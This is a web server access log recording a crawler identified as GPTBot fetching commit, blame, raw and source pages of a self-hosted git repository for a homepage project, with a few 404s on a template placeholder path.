https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx" +[17/Feb/2026:13:19:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" +[17/Feb/2026:13:19:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16909] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx" +[17/Feb/2026:13:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15899] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx" +[17/Feb/2026:13:19:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" [Client 74.7.227.38] [Length 14959] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" +[17/Feb/2026:13:19:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx" +[17/Feb/2026:13:19:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" +[17/Feb/2026:13:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx" +[17/Feb/2026:13:19:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15901] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx" +[17/Feb/2026:13:19:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14293] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx" +[17/Feb/2026:13:19:22 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Header.tsx" +[17/Feb/2026:13:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" [Client 74.7.227.38] [Length 14957] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" +[17/Feb/2026:13:19:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16910] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx" +[17/Feb/2026:13:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx" [Client 74.7.227.38] [Length 13779] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx" +[17/Feb/2026:13:19:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Contact.tsx" +[17/Feb/2026:13:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Contact.tsx" +[17/Feb/2026:13:19:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/ChatBot.tsx" +[17/Feb/2026:13:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/About.tsx" +[17/Feb/2026:13:19:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/ChatBot.tsx" +[17/Feb/2026:13:19:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx" [Client 74.7.227.38] [Length 13781] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx" +[17/Feb/2026:13:19:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/About.tsx" +[17/Feb/2026:13:19:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" [Client 74.7.227.38] [Length 14805] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" +[17/Feb/2026:13:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx" [Client 74.7.227.38] [Length 13920] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" +[17/Feb/2026:13:19:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14189] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" +[17/Feb/2026:13:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" +[17/Feb/2026:13:19:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Footer.tsx" +[17/Feb/2026:13:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15541] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" +[17/Feb/2026:13:19:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Contact.tsx" +[17/Feb/2026:13:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14188] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components" +[17/Feb/2026:13:19:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project" [Client 74.7.227.38] [Length 10359] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project" +[17/Feb/2026:13:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/-/projects" [Client 74.7.227.38] [Length 6768] [Gzip 2.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer" +[17/Feb/2026:13:19:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile" [Client 74.7.227.38] [Length 11571] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:13:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" +[17/Feb/2026:13:19:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" [Client 74.7.227.38] [Length 14957] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" +[17/Feb/2026:13:19:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx" +[17/Feb/2026:13:19:35 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx" +[17/Feb/2026:13:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14294] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx" +[17/Feb/2026:13:19:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx" +[17/Feb/2026:13:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15900] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx" +[17/Feb/2026:13:19:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx" +[17/Feb/2026:13:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14293] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx" +[17/Feb/2026:13:19:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" +[17/Feb/2026:13:19:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile" [Client 74.7.227.38] [Length 9909] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile" +[17/Feb/2026:13:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile" [Client 74.7.227.38] [Length 264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile" +[17/Feb/2026:13:19:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile" [Client 74.7.227.38] [Length 10759] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile" +[17/Feb/2026:13:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx" +[17/Feb/2026:13:19:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx" [Client 74.7.227.38] [Length 13780] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/About.tsx" +[17/Feb/2026:13:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Footer.tsx" +[17/Feb/2026:13:19:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/ChatBot.tsx" +[17/Feb/2026:13:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Footer.tsx" +[17/Feb/2026:13:19:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/releases" [Client 74.7.227.38] [Length 7421] [Gzip 2.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" +[17/Feb/2026:13:19:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659894] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/controller-cpp.md" +[17/Feb/2026:13:19:50 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Header.tsx" +[17/Feb/2026:13:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md" [Client 74.7.227.38] [Length 659894] [Gzip 25.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/controller-cpp.md" +[17/Feb/2026:13:19:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer.atom" [Client 74.7.227.38] [Length 7818] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" +[17/Feb/2026:13:19:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" [Client 74.7.227.38] [Length 9852] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" 